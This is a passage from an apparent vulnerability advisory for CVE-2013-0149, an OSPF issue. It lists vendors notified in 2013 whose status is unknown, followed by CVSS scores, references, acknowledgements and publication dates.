Vendor References

Gentoo Linux Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Google Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Hewlett-Packard Company Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IBM Corporation (zseries) Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IBM eServer Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

IP Infusion, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Infoblox Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Internet Security Systems, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Intoto Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Mandriva S. A. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Mellanox Technologies Unknown

Notified: July 10, 2013 Updated: July 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Microsoft Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

MontaVista Software, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

NetApp Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

NetBSD Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Nokia Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Nortel Networks, Inc. Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Novell, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

OpenBSD Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Openwall GNU/*/Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Peplink Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Process Software Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Q1 Labs Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

QLogic Unknown

Notified: July 17, 2013 Updated: July 17, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

QNX Software Systems Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Red Hat, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SUSE Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SafeNet Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Secureworx, Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Silicon Graphics, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Slackware Linux Inc. Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

SmoothWall Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Snort Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Sony Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Sourcefire Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Stonesoft Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Symantec Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

The SCO Group Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

TippingPoint Technologies Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Turbolinux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Ubuntu Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Unisys Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Wind River Systems, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Windstream Unknown

Notified: July 29, 2013 Updated: July 29, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

ZyXEL Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

m0n0wall Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

netfilter Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

CVSS Metrics

Group | Score | Vector
---|---|---
Base | 5.4 | AV:A/AC:M/Au:N/C:P/I:P/A:P
Temporal | 4.2 | E:POC/RL:OF/RC:C
Environmental | 5.1 | CDP:MH/TD:M/CR:ND/IR:ND/AR:H

References

  • <http://tools.ietf.org/html/rfc2328>
  • <http://en.wikipedia.org/wiki/Open_Shortest_Path_First>

Acknowledgements

Thanks to Dr. Gabi Nakibly for reporting this vulnerability.

This document was written by Chris King.

Other Information

CVE IDs: | CVE-2013-0149
---|---
Date Public: | 2013-08-01
Date First Published: | 2013-08-02
Date Last Updated: | 2013-12-06 18:59 UTC
Document Revision: | 58